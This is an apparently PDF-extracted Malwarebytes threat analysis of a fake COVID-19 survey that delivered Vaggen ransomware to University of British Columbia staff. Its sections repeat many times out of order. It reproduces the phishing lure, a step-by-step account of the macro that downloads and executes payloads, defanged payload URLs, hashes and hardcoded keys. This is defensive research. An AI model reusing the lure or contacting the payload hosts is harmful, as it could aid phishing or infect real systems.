address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1156 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1157 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1158 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1159 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1160 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1161 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1162 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1163 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1164 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1165 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1166 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1167 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1168 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1169 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1170 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1171 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1172 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1173 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1174 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1175 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1176 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1177 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1178 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1179 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1180 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1181 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1182 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1183 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1184 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1185 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1186 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1187 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1188 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and 